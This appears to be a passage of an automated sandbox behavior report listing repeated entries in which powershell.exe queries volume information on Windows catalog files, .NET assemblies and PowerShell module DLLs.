                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
